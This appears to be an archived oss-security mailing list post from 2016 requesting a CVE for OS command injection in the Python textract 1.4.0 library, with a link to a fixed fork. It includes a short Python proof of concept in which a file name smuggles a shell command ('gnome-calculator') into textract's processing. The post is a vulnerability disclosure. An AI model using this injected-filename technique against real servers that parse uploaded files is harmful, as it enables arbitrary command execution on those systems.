Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CAO8=cJ-0zddSyndp=8ot8BHxyeC2r0Ln0nQvbFx0JQ3Dpg=0dA@mail.gmail.com>
Date: Thu, 20 Oct 2016 17:40:50 -0400
From: Pierre Ernst <pernst@...esforce.com>
To: oss-security@...ts.openwall.com
Subject: CVE request - textract 1.4.0 - OS Command Injection

The Python textract component (
https://github.com/deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS
command injection.

this fork contains a fix:
https://github.com/pierre-ernst/textract


Parsing a file with a malicious name leads to arbitrary OS command
injection, this is especially risky when parsing user-supplied files on a
server (e.g. uploaded files)

PoC:

import textract
import sys
import os

# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
file = open(fileName,'w+')
file.write('Pierre Ernst, Salesforce')
file.close()

# parse newly created file
text = textract.process(fileName)
print text

# cleanup
os.remove(fileName);


-- 
Pierre Ernst
Salesforce

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.